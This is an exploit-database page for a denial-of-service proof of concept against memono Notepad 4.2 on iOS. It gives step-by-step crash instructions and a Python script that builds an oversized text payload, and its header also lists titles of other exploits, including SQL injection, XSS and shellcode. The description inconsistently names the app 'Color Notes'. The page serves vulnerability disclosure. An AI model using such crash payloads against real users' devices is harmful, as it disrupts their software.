
6 changes to exploits/shellcodes Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Student Result Management System 1.0 - 'class' SQL Injection TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)
35 lines
No EOL
1,005 B
Python
Executable file
35 lines
No EOL
1,005 B
Python
Executable file
# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
|
|
# Date: 06-09-2021
|
|
# Author: Geovanni Ruiz
|
|
# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
|
|
# Version: 4.2
|
|
# Category: DoS (iOS)
|
|
|
|
##### Vulnerability #####
|
|
|
|
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
|
|
|
|
# STEPS #
|
|
# Open the program.
|
|
# Create a new Note.
|
|
# Run the python exploit script payload.py, it will create a new payload.txt file
|
|
# Copy the content of the file "payload.txt"
|
|
# Paste the content from payload.txt twice in the new Note.
|
|
# Crashed
|
|
|
|
Successful exploitation will cause the application to stop working.
|
|
|
|
I have been able to test this exploit against iOS 14.2.
|
|
|
|
##### PoC #####
|
|
--> payload.py <--
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 350000
|
|
|
|
try:
|
|
f = open("payload.txt","w")
|
|
f.write(buffer)
|
|
f.close()
|
|
print ("File created")
|
|
except:
|
|
print ("File cannot be created") |